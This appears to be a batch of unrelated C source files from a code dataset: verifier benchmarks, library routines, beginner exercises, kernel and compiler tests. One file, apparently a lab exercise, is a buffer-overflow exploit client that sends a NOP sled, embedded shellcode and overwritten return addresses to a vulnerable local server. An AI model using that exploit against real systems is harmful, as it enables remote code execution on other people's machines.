if (zeros == controller.b_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller numerator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (controller.a_size > 0)
{
unsigned j, zeros=0;
for (j = 0; j < controller.a_size; ++j)
{
if (controller.a[j]==0)
++zeros;
}
if (zeros == controller.a_size)
{
printf("\n\n*****************************************************************************************************\n");
printf("* The controller denominator must not be zero *\n");
printf("*****************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (0 == 0)
{
printf("\n\n***************************************************************************************************************\n");
printf("* set a connection mode to check CLOSED LOOP with DSVerifier (use: --connection-mode TYPE) *\n");
printf("***************************************************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (7 == 0)
{
printf("\n\n***************************************************************************************\n");
printf("* set the property to check with DSVerifier (use: --property NAME) *\n");
printf("***************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if ((7 == 3) || (7 == 2) || (7 == 1) ||
(7 == 10) || (7 == 11) ||
(7 == 4 || 7 == 5) || 7 == 6)
{
if ((5 == 0) && !(0 == 1))
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE to use this property in DSVerifier (use: --x-size VALUE) *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else if (0 == 1)
{
X_SIZE_VALUE = nondet_uint();
__DSVERIFIER_assume( X_SIZE_VALUE > (2 * ds.a_size));
}
else if (5 < 0)
{
printf("\n\n********************************************************************************************\n");
printf("* set a X_SIZE > 0 *\n");
printf("********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
else
{
X_SIZE_VALUE = 5;
}
}
if ((1 == 0) && (7 != 9) && (7 != 18))
{
printf("\n\n*********************************************************************************************\n");
printf("* set the realization to check with DSVerifier (use: --realization NAME) *\n");
printf("*********************************************************************************************\n");
__DSVERIFIER_assert(0);
}
if (7 == 6 || 7 == 11)
{
if (impl.max_error == 0)
{
printf("\n\n***********************************************************************\n");
printf("* provide the maximum expected error (use: impl.max_error) *\n");
printf("***********************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if (7 == 4 || 7 == 5)
{
if (7 == 5 || 7 == 4)
{
if (hw.clock == 0l)
{
printf("\n\n***************************\n");
printf("* Clock could not be zero *\n");
printf("***************************\n");
__DSVERIFIER_assert(0);
}
hw.cycle = ((double) 1.0 / hw.clock);
if (hw.cycle < 0)
{
printf("\n\n*********************************************\n");
printf("* The cycle time could not be representable *\n");
printf("*********************************************\n");
__DSVERIFIER_assert(0);
}
if (ds.sample_time == 0)
{
printf("\n\n*****************************************************************************\n");
printf("* provide the sample time of the digital system (ds.sample_time) *\n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
}
if (7 == 18)
{
if (!((filter.Ap > 0) && (filter.Ac >0) && (filter.Ar >0)))
{
printf("\n\n*****************************************************************************\n");
printf("* set values bigger than 0 for Ap, Ac and Ar* \n");
printf("*****************************************************************************\n");
__DSVERIFIER_assert(0);
}
}
if ((1 == 7) || (1 == 8) || (1 == 9) ||
(1 == 10) || (1 == 11) || (1 == 12))
{
printf("\n\n******************************************\n");
printf("* Temporarily the cascade modes are disabled *\n");
printf("**********************************************\n");
__DSVERIFIER_assert(0);
}
}
void call_verification_task(void * verification_task)
{
int i = 0;
_Bool base_case_executed = 0;
if (0 == 2)
{
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ds.b_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ds.a_uncertainty[i];
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
else
{
int i=0;
for(i=0; i<ds.b_size; i++)
{
if (ds.b_uncertainty[i] > 0)
{
double factor = ((ds.b[i] * ds.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.b[i] - factor;
double max = ds.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.b[i] = nondet_double();
__DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max));
}
}
for(i=0; i<ds.a_size; i++)
{
if (ds.a_uncertainty[i] > 0)
{
double factor = ((ds.a[i] * ds.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = ds.a[i] - factor;
double max = ds.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
ds.a[i] = nondet_double();
__DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max));
}
}
}
((void(*)())verification_task)();
}
void call_closedloop_verification_task(void * closedloop_verification_task)
{
_Bool base_case_executed = 0;
int i=0;
for(i=0; i<plant.b_size; i++)
{
if (plant.b_uncertainty[i] > 0)
{
double factor = ((plant.b[i] * plant.b_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.b[i] - factor;
double max = plant.b[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant_cbmc.b[i] = nondet_double();
__DSVERIFIER_assume((plant_cbmc.b[i] >= min) && (plant_cbmc.b[i] <= max));
}else{
plant_cbmc.b[i] = plant.b[i];
}
}
for(i=0; i<plant.a_size; i++)
{
if (plant.a_uncertainty[i] > 0)
{
double factor = ((plant.a[i] * plant.a_uncertainty[i]) / 100);
factor = factor < 0 ? factor * (-1) : factor;
double min = plant.a[i] - factor;
double max = plant.a[i] + factor;
if ((factor == 0) && (base_case_executed == 1))
{
continue;
}
else if ((factor == 0) && (base_case_executed == 0))
{
base_case_executed = 1;
}
plant_cbmc.a[i] = nondet_double();
__DSVERIFIER_assume((plant_cbmc.a[i] >= min) && (plant_cbmc.a[i] <= max));
}
else
{
plant_cbmc.a[i] = plant.a[i];
}
}
((void(*)())closedloop_verification_task)();
}
# 2 "benchmarks/ds-01-impl1.c" 2
digital_system ds = {
.b = { 1.5, -0.5 },
.b_size = 2,
.a = { 1.0, 0.0 },
.a_size = 2,
.sample_time = 0.02
};
implementation impl = {
.int_bits = 2,
.frac_bits = 14,
.max = 1.0,
.min = -1.0
};
|
the_stack_data/234518209.c | /*-------------------------------------------------------------------------
strupr.c - part of string library functions
Copyright (C) 2004, Vangelis Rokas <vrokas at otenet.gr>
This library is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2, or (at your option) any
later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this library; see the file COPYING. If not, write to the
Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
As a special exception, if you link this library with other files,
some of which are compiled with SDCC, to produce an executable,
this library does not by itself cause the resulting executable to
be covered by the GNU General Public License. This exception does
not however invalidate any other reasons why the executable file
might be covered by the GNU General Public License.
-------------------------------------------------------------------------*/
#include <ctype.h>
#include <string.h>
char *
strupr (char *str)
{
char *ret = str;
while (*str)
{
*str = toupper (*str);
++str;
}
return ret;
}
|
the_stack_data/7951092.c | #include <stdio.h>
int main() {
int i, j, k, l, m = 11;
int a, b, c, d, e;
for (i = 0; i < 6; i++) {
for (k = i; k > 0 && i != 0; k--) {
printf(" ");
}
for (j = m; j > 0; j--) {
printf("c");
}
m -= 2;
printf("\n");
}
d = 3;
for (a = 4; a >= 0; a--) {
for (b = a; b >= 1; b--) {
printf(" ");
}
for (c = d; c > 0; c--) {
printf("c");
}
d += 2;
printf("\n");
}
return 0;
}
|
the_stack_data/141814.c | #include <stdio.h>
#include <string.h>
main()
{
char a[501];
int sum,s[26];
int test,i,j,k,l;
scanf("%d",&test);
getchar();
for(k=0;k<test;k++)
{
sum=0;
gets(a);
l=strlen(a);
for(i=0;i<26;i++)
{
s[i]=0;
}
for(i=0;i<l;i++)
{
if(a[i]>='A' && a[i]<='Z')
{
j=a[i]-65;
s[j]++;
if(s[j]>sum)
{
sum=s[j];
}
}
else if(a[i]>='a' && a[i]<='z')
{
j=a[i]-97;
s[j]++;
if(s[j]>sum)
{
sum=s[j];
}
}
}
for(i=0;i<26;i++)
{
if(s[i]==sum)
printf("%c",i+97);
}
printf("\n");
}
return 0;
}
|
the_stack_data/934177.c | #include <stdio.h>
int main()
{
int number = 0, prime = 1, sumPrimes = 0, i = 0;
printf("Digite um valor: ");
scanf("%d", &number);
while (i < number)
{
sumPrimes += prime;
prime+=2;
i++;
}
printf("O quadrado de %d e: %d \n", number, sumPrimes);
return 0;
}
|
the_stack_data/11075173.c | #include <stdio.h>
int main()
{
int a,b;
printf("Type a positive value: ");
scanf("%d",&b);
for(a=0;a<b;a++)
{
printf("I must do this %d times\n",b);
if(a==9)
break;
}
return(0);
}
|
the_stack_data/143547.c | #include <stdio.h>
#define MAX_MONTH 12
#define MAX_YEARDAY 365
/* There is no error checking in `day_of_year` and `month_day`. Remedy this
* defect. */
int day_of_year(int year, int month, int day);
void month_day(int year, int yearday, int *pmonth, int *pday);
/* sort input lines */
int main(){
int pmonth = 0, pday = 0;
int yeardays[3];
printf("Day of year %2d/%2d/%4d: %3d\n", 31, 12, 2021, yeardays[0] = day_of_year(2021, 12, 31));
printf("Day of year %2d/%2d/%4d: %3d\n", 1, 3, 2020, yeardays[1] = day_of_year(2020, 3, 1));
printf("Day of year %2d/%2d/%4d: %3d\n", 8, 10, 2021, yeardays[2] = day_of_year(2021, 10, 8));
month_day(2021, yeardays[0], &pmonth, &pday);
printf("Month Day of %3d: %2d/%2d\n", yeardays[0], pday, pmonth);
month_day(2020, yeardays[1], &pmonth, &pday);
printf("Month Day of %3d: %2d/%2d\n", yeardays[1], pday, pmonth);
month_day(2021, yeardays[2], &pmonth, &pday);
printf("Month Day of %3d: %2d/%2d\n", yeardays[2], pday, pmonth);
printf("\nInvalid tests:\n");
printf("Day of year %2d/%2d/%4d: %3d\n", 42, 10, 2021, day_of_year(2021, 10, 42));
printf("Day of year %2d/%2d/%4d: %3d\n", 8, 14, 2021, day_of_year(2021, 14, 8));
printf("Day of year %2d/%2d/%4d: %3d\n", 8, 10, -2021, day_of_year(-2021, 10, 8));
month_day(2021, 400, &pmonth, &pday);
printf("Month Day of %3d: %2d/%2d\n", 400, pday, pmonth);
month_day(2020, -21, &pmonth, &pday);
printf("Month Day of %3d: %2d/%2d\n", -21, pday, pmonth);
return 0;
}
static char daytab[2][13] = {{0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31},
{0, 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}};
/* day of year: set day of year from month & day */
int day_of_year(int year, int month, int day){
int i, leap;
/* check for valid date: Month 1-12, day 1-daytab[Month], year > 0 */
if(year <= 0){
printf("Error: invalid date. CE Years only.n\n");
return -1;
}
if(month < 1 || month > MAX_MONTH){
printf("Error: invalid date. Invalid month %d\n.", month);
return -1;
}
leap = year%4 == 0 && year%100 !=0 || year%400 == 0;
if(day < 1 || day > daytab[leap][month]){
printf("Error: invalid date. Invalid day %d\n.", day);
return -1;
}
for(i = 1; i < month; i++)
day += daytab[leap][i];
return day;
}
/* month_day: set month, day from day of year */
void month_day(int year, int yearday, int *pmonth, int *pday){
int i, leap;
/* check for valid date: yearday 1-365/366 */
leap = year%4 == 0 && year%100 !=0 || year%400 == 0;
if(yearday < 1 || yearday > MAX_YEARDAY+leap){
printf("Error: invalid date. Invalid yearday %d\n.", yearday);
*pmonth = 0;
*pday = 0;
return;
}
for(i = 1; yearday > daytab[leap][i]; i++)
yearday -= daytab[leap][i];
*pmonth = i;
*pday = yearday;
}
|
the_stack_data/164201.c | /*
* ioperm.c - Test case for ioperm(2)
* Copyright (c) 2015 Andrew Lutomirski
*/
#define _GNU_SOURCE
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <stdbool.h>
#include <sched.h>
#include <sys/io.h>
static int nerrs = 0;
static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *),
int flags)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = handler;
sa.sa_flags = SA_SIGINFO | flags;
sigemptyset(&sa.sa_mask);
if (sigaction(sig, &sa, 0))
err(1, "sigaction");
}
static void clearhandler(int sig)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_DFL;
sigemptyset(&sa.sa_mask);
if (sigaction(sig, &sa, 0))
err(1, "sigaction");
}
static jmp_buf jmpbuf;
static void sigsegv(int sig, siginfo_t *si, void *ctx_void)
{
siglongjmp(jmpbuf, 1);
}
static bool try_outb(unsigned short port)
{
sethandler(SIGSEGV, sigsegv, SA_RESETHAND);
if (sigsetjmp(jmpbuf, 1) != 0) {
return false;
} else {
asm volatile ("outb %%al, %w[port]"
: : [port] "Nd" (port), "a" (0));
return true;
}
clearhandler(SIGSEGV);
}
static void expect_ok(unsigned short port)
{
if (!try_outb(port)) {
printf("[FAIL]\toutb to 0x%02hx failed\n", port);
exit(1);
}
printf("[OK]\toutb to 0x%02hx worked\n", port);
}
static void expect_gp(unsigned short port)
{
if (try_outb(port)) {
printf("[FAIL]\toutb to 0x%02hx worked\n", port);
exit(1);
}
printf("[OK]\toutb to 0x%02hx failed\n", port);
}
int main(void)
{
cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(0, &cpuset);
if (sched_setaffinity(0, sizeof(cpuset), &cpuset) != 0)
err(1, "sched_setaffinity to CPU 0");
expect_gp(0x80);
expect_gp(0xed);
/*
* Probe for ioperm support. Note that clearing ioperm bits
* works even as nonroot.
*/
printf("[RUN]\tenable 0x80\n");
if (ioperm(0x80, 1, 1) != 0) {
printf("[OK]\tioperm(0x80, 1, 1) failed (%d) -- try running as root\n",
errno);
return 0;
}
expect_ok(0x80);
expect_gp(0xed);
printf("[RUN]\tdisable 0x80\n");
if (ioperm(0x80, 1, 0) != 0) {
printf("[FAIL]\tioperm(0x80, 1, 0) failed (%d)", errno);
return 1;
}
expect_gp(0x80);
expect_gp(0xed);
/* Make sure that fork() preserves ioperm. */
if (ioperm(0x80, 1, 1) != 0) {
printf("[FAIL]\tioperm(0x80, 1, 0) failed (%d)", errno);
return 1;
}
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
printf("[RUN]\tchild: check that we inherited permissions\n");
expect_ok(0x80);
expect_gp(0xed);
return 0;
} else {
int status;
if (waitpid(child, &status, 0) != child ||
!WIFEXITED(status)) {
printf("[FAIL]\tChild died\n");
nerrs++;
} else if (WEXITSTATUS(status) != 0) {
printf("[FAIL]\tChild failed\n");
nerrs++;
} else {
printf("[OK]\tChild succeeded\n");
}
}
/* Test the capability checks. */
printf("\tDrop privileges\n");
if (setresuid(1, 1, 1) != 0) {
printf("[WARN]\tDropping privileges failed\n");
return 0;
}
printf("[RUN]\tdisable 0x80\n");
if (ioperm(0x80, 1, 0) != 0) {
printf("[FAIL]\tioperm(0x80, 1, 0) failed (%d)", errno);
return 1;
}
printf("[OK]\tit worked\n");
printf("[RUN]\tenable 0x80 again\n");
if (ioperm(0x80, 1, 1) == 0) {
printf("[FAIL]\tit succeeded but should have failed.\n");
return 1;
}
printf("[OK]\tit failed\n");
return 0;
}
|
the_stack_data/225142271.c | // This file is part of CPAchecker,
// a tool for configurable software verification:
// https://cpachecker.sosy-lab.org
//
// SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
//
// SPDX-License-Identifier: Apache-2.0
extern __VERIFIER_nondet_int();
int main() {
int a = __VERIFIER_nondet_int();
int b = a;
a = a + 10;
b = b + 10;
if (a != b) {
goto ERROR;
}
b = b - 10;
if (b != a - 10) {
goto ERROR;
} else {
a = a - 10;
}
b = (b * 10 / 2) % 7;
a *= 10;
a = (a / 2) % 7;
if (a != b) {
goto ERROR;
}
/* int temp = b;
b = b >> a;
a = a >> temp;
if (a != b) {
goto ERROR;
} */
a = - a;
b = - b;
a = ~ b;
b = ~ a;
if (~ a == b) {
return 0;
} else {
ERROR:
return -1;
}
}
|
the_stack_data/15763794.c | /* Program to deliver shellcode to a vulnerable server
* 2011
* Compile as:
* gcc -fno-stack-protector -z execstack -o send send.c
* Also remember to:
* echo 0 > /proc/sys/kernel/randomize_va_space
* echo 0 > /proc/sys/kernel/exec-shield
*/
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <string.h>
char payload[] = "\x48\xbe\xc9\x19\x11\x11\x11\x11\x11\x11\x48\xc1\xe6\x30\x48\xc1\xee\x30\x48\xbf\x6f\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe7\x38\x48\xc1\xef\x38\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x6e\x61\x6e\x57\x48\x89\xe7\x48\xb8\x5a\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05";
/* Replace this with the value from server.c */
long ret = 0x7fffffffe010;
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in server_addr;
int server_size;
long addr;
int i;
char buf[768];
if (argc != 3)
{
printf("Usage: %s [port] [offset]\n", argv[0]);
return -1;
}
ret += atol(argv[2]);
sockfd = socket(PF_INET, SOCK_STREAM, 0);
if (sockfd <= 0)
{
perror("socket");
return -1;
}
memset(&server_addr, 0, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
server_addr.sin_port = htons(atoi(argv[1]));
if (connect(sockfd, (struct sockaddr *) &server_addr, sizeof(server_addr)) == -1)
{
perror("connect");
return -1;
}
/* NOOP margin */
memset(buf, 0x90, 384);
/* Payload */
memcpy(buf+384, payload, sizeof(payload));
/* Remaining buffer */
addr = (long) buf+384+sizeof(payload);
/* 8-byte align the return addresses */
while (addr % 8 != 0) addr++;
/* Repeat return address for rest of buf */
for (i = 0; i < (sizeof(buf)-384-sizeof(payload)-8)/8; i++)
{
*(((long *)addr)+i) = ret;
}
if (send(sockfd, buf, sizeof(buf), 0) < 0)
{
perror("send");
return -1;
}
printf("Payload sent with return address 0x%lx\n", ret);
return 0;
}
|
the_stack_data/890413.c | #include <stdio.h>
#include <string.h>
#include <stdbool.h>
int main(void)
{
double value = 0;
char str[] = "3.5 2.5 1.26"; // The string to be convered
char *pstr = str; // Pointer to the string to be converted
char *ptr = NULL; // Pointer to character position after conversion
while (true)
{
value = strtod(pstr, &ptr); // Convert starting at pstr
if (pstr == ptr) // pstr stored if no conversion...
break; // ...so we are done
else
{
printf(" %f", value); // Output the resultant value
pstr = ptr; // Store start for next conversion
}
}
}
|
the_stack_data/55232.c | /* ctanhf.c */
/*
Contributed by Danny Smith
2004-12-24
*/
#include <math.h>
#include <complex.h>
#include <errno.h>
/*
ctanh (x + I * y) = (sinh (2 * x) + sin (2 * y) * I )
/ (cosh (2 * x) + cos (2 * y)) .
*/
float complex
ctanhf (float complex Z)
{
float complex Res;
float two_R = 2.0f * __real__ Z;
float two_I = 2.0f * __imag__ Z;
float denom = coshf (two_R) + cosf (two_I);
if (denom == 0.0f)
{
errno = ERANGE;
__real__ Res = HUGE_VALF;
__imag__ Res = HUGE_VALF;
}
else if (isinf (denom))
{
errno = ERANGE;
__real__ Res = two_R > 0 ? 1.0f : -1.0f;
__imag__ Res = 0.0f;
}
else
{
__real__ Res = sinhf (two_R) / denom;
__imag__ Res = sinf (two_I) / denom;
}
return Res;
}
|
the_stack_data/218893760.c | #include <stdio.h>
#define ALPHA_NR 26
#define NUM_NR 10
int main(void)
{
int i;
char chars_freq[ALPHA_NR + NUM_NR];
// Initialize the chars_freq array with 0
for (i = 0; i < (ALPHA_NR + NUM_NR); ++i)
{
chars_freq[i] = 0;
}
// Count characters from the standard input
char c;
while ((c = getchar()) != EOF)
{
if (c >= 'a' && c <= 'z')
{
++chars_freq[c - 'a'];
}
else if (c >= '0' && c <= '9')
{
++chars_freq[c - '0' + ALPHA_NR];
}
}
// Print horizontal histogram
for (i = 0; i < (ALPHA_NR + NUM_NR); ++i)
{
if (i < ALPHA_NR)
{
printf("%c: ", 'a' + i);
}
else if (i >= ALPHA_NR)
{
printf("%c: ", '0' + i - ALPHA_NR);
}
int j;
for (j = 0; j < chars_freq[i]; ++j)
{
printf("#");
}
putchar('\n');
}
return 0;
}
|
the_stack_data/72574.c | #include <stdint.h>
#include <stdio.h>
int tab[]; |
the_stack_data/92032.c | #include <stdio.h>
#include <stdlib.h>
int evalRPN(char ** tokens, int tokensSize){
int* pStack = (int*)malloc(tokensSize * sizeof(int));
int top = -1;
int row = 0;
int left = 0;
int right = 0;
for (row = 0; row <= tokensSize - 1; row++)
{
if ('+' == tokens[row][0])
{
right = pStack[top--]; // pop
left = pStack[top--]; // pop
pStack[++top] = left + right; // push
}
else if ('-' == tokens[row][0] && '\0' == tokens[row][1]) // 负数
{
right = pStack[top--]; // pop
left = pStack[top--]; // pop
pStack[++top] = left - right; // push
}
else if ('*' == tokens[row][0])
{
right = pStack[top--]; // pop
left = pStack[top--]; // pop
pStack[++top] = left * right; // push
}
else if ('/' == tokens[row][0])
{
right = pStack[top--]; // pop
left = pStack[top--]; // pop
pStack[++top] = left / right; // push
}
else // number
{
pStack[++top] = atoi(tokens[row]); // push
}
}
return pStack[top]; // peek
} |
the_stack_data/12637502.c | #include<stdio.h>
#include<stdlib.h>
#define bool int
/* A binary tree tNode has data, pointer to left child
and a pointer to right child */
struct tNode
{
int data;
struct tNode* left;
struct tNode* right;
};
/* Structure of a stack node. Linked List implementation is used for
stack. A stack node contains a pointer to tree node and a pointer to
next stack node */
struct sNode
{
struct tNode *t;
struct sNode *next;
};
/* Stack related functions */
void push(struct sNode** top_ref, struct tNode *t);
struct tNode *pop(struct sNode** top_ref);
bool isEmpty(struct sNode *top);
/* Iterative function for inorder tree traversal */
void inOrder(struct tNode *root)
{
/* set current to root of binary tree */
struct tNode *current = root;
struct sNode *s = NULL; /* Initialize stack s */
bool done = 0;
while (!done)
{
/* Reach the left most tNode of the current tNode */
if(current != NULL)
{
/* place pointer to a tree node on the stack before traversing
the node's left subtree */
push(&s, current);
current = current->left;
}
/* backtrack from the empty subtree and visit the tNode
at the top of the stack; however, if the stack is empty,
you are done */
else
{
if (!isEmpty(s))
{
current = pop(&s);
printf("%d ", current->data);
/* we have visited the node and its left subtree.
Now, it's right subtree's turn */
current = current->right;
}
else
done = 1;
}
} /* end of while */
}
/* UTILITY FUNCTIONS */
/* Function to push an item to sNode*/
void push(struct sNode** top_ref, struct tNode *t)
{
/* allocate tNode */
struct sNode* new_tNode =
(struct sNode*) malloc(sizeof(struct sNode));
if(new_tNode == NULL)
{
printf("Stack Overflow \n");
getchar();
exit(0);
}
/* put in the data */
new_tNode->t = t;
/* link the old list off the new tNode */
new_tNode->next = (*top_ref);
/* move the head to point to the new tNode */
(*top_ref) = new_tNode;
}
/* The function returns true if stack is empty, otherwise false */
bool isEmpty(struct sNode *top)
{
return (top == NULL)? 1 : 0;
}
/* Function to pop an item from stack*/
struct tNode *pop(struct sNode** top_ref)
{
struct tNode *res;
struct sNode *top;
/*If sNode is empty then error */
if(isEmpty(*top_ref))
{
printf("Stack Underflow \n");
getchar();
exit(0);
}
else
{
top = *top_ref;
res = top->t;
*top_ref = top->next;
free(top);
return res;
}
}
/* Helper function that allocates a new tNode with the
given data and NULL left and right pointers. */
struct tNode* newtNode(int data)
{
struct tNode* tNode = (struct tNode*)
malloc(sizeof(struct tNode));
tNode->data = data;
tNode->left = NULL;
tNode->right = NULL;
return(tNode);
}
/* Driver program to test above functions*/
int main()
{
/* Constructed binary tree is
1
/ \
2 3
/ \
4 5
*/
struct tNode *root = newtNode(1);
root->left = newtNode(2);
root->right = newtNode(3);
root->left->left = newtNode(4);
root->left->right = newtNode(5);
inOrder(root);
getchar();
return 0;
}
|
the_stack_data/75138871.c | /* Table of CRCs of all 8-bit messages. */
unsigned long crc_table[256];
/* Flag: has the table been computed? Initially false. */
int crc_table_computed = 0;
/* Make the table for a fast CRC. */
void make_crc_table(void)
{
unsigned long c;
int n, k;
for (n = 0; n < 256; n++) {
c = (unsigned long) n;
for (k = 0; k < 8; k++) {
if (c & 1) {
c = 0xedb88320L ^ (c >> 1);
} else {
c = c >> 1;
}
}
crc_table[n] = c;
}
crc_table_computed = 1;
}
/*
Update a running crc with the bytes buf[0..len-1] and return
the updated crc. The crc should be initialized to zero. Pre- and
post-conditioning (one's complement) is performed within this
function so it shouldn't be done by the caller. Usage example:
unsigned long crc = 0L;
while (read_buffer(buffer, length) != EOF) {
crc = update_crc(crc, buffer, length);
}
if (crc != original_crc) error();
*/
unsigned long update_crc(unsigned long crc,
unsigned char *buf, int len)
{
unsigned long c = crc ^ 0xffffffffL;
int n;
if (!crc_table_computed)
make_crc_table();
for (n = 0; n < len; n++) {
c = crc_table[(c ^ buf[n]) & 0xff] ^ (c >> 8);
}
return c ^ 0xffffffffL;
}
/* Return the CRC of the bytes buf[0..len-1]. */
unsigned long crc(unsigned char *buf, int len)
{
return update_crc(0L, buf, len);
}
|
the_stack_data/12638514.c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_print_comb.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: lyuri-go <[email protected]> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2021/04/02 01:06:47 by lyuri-go #+# #+# */
/* Updated: 2021/04/04 18:53:05 by lyuri-go ### ########.fr */
/* */
/* ************************************************************************** */
#include <unistd.h>
void print_combo_numbers(int *n)
{
if (n[1] < n[2])
{
write(1, &n[0], 1);
write(1, &n[1], 1);
write(1, &n[2], 1);
if (!((n[0] == 55) && (n[1] == 56) && (n[2] == 57)))
{
write(1, ", ", 2);
}
}
}
void ft_print_comb(void)
{
int n[3];
n[0] = 47;
n[1] = 48;
n[2] = 49;
while (++n[0] <= 57)
{
while (++n[1] <= 57)
{
if (n[0] < n[1])
{
while (++n[2] <= 57)
{
print_combo_numbers(n);
}
}
n[2] = 49;
}
n[1] = 48;
}
}
|
the_stack_data/32866.c | /* Test -Wsizeof-pointer-memaccess warnings. */
/* { dg-do compile } */
/* { dg-options "-Wall -O2 -Wno-array-bounds -Wno-sizeof-array-argument -Wno-stringop-truncation -ftrack-macro-expansion=0" } */
/* { dg-options "-Wall -O2 -Wno-array-bounds -Wno-sizeof-array-argument -Wno-stringop-truncation -Wno-c++-compat -ftrack-macro-expansion=0" {target c} } */
/* { dg-require-effective-target alloca } */
#define bos(ptr) __builtin_object_size (ptr, 1)
#define bos0(ptr) __builtin_object_size (ptr, 0)
#define memset(dst, val, sz) __builtin___memset_chk (dst, val, sz, bos (dst))
#define memcpy(dst, src, sz) __builtin___memcpy_chk (dst, src, sz, bos (dst))
#define memmove(dst, src, sz) __builtin___memmove_chk (dst, src, sz, bos (dst))
#define strncpy(dst, src, sz) __builtin___strncpy_chk (dst, src, sz, bos (dst))
#define strncat(dst, src, sz) __builtin___strncat_chk (dst, src, sz, bos (dst))
#define stpncpy(dst, src, sz) __builtin___stpncpy_chk (dst, src, sz, bos (dst))
struct A { short a, b; int c, d; long e, f; };
typedef struct A TA;
typedef struct A *PA;
typedef TA *PTA;
struct B {};
typedef struct B TB;
typedef struct B *PB;
typedef TB *PTB;
typedef int X[3][3][3];
void
f1 (void *x)
{
struct A a, *pa1 = &a;
TA *pa2 = &a;
PA pa3 = &a;
PTA pa4 = &a;
memset (&a, 0, sizeof (&a)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
memset (pa1, 0, sizeof (pa1)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pa2, 0, sizeof pa2); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pa3, 0, sizeof (pa3)); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pa4, 0, sizeof pa4); /* { dg-warning "call is the same expression as the destination; did you mean to dereference it" } */
memset (pa1, 0, sizeof (struct A *)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pa2, 0, sizeof (PTA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pa3, 0, sizeof (PA)); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memset (pa4, 0, sizeof (__typeof (pa4))); /* { dg-warning "call is the same pointer type \[^\n\r\]* as the destination; expected \[^\n\r\]* or an explicit length" } */
memcpy (&a, x, sizeof (&a)); /* { dg-warning "call is the same expression as the destination; did you mean to remove the addressof" } */
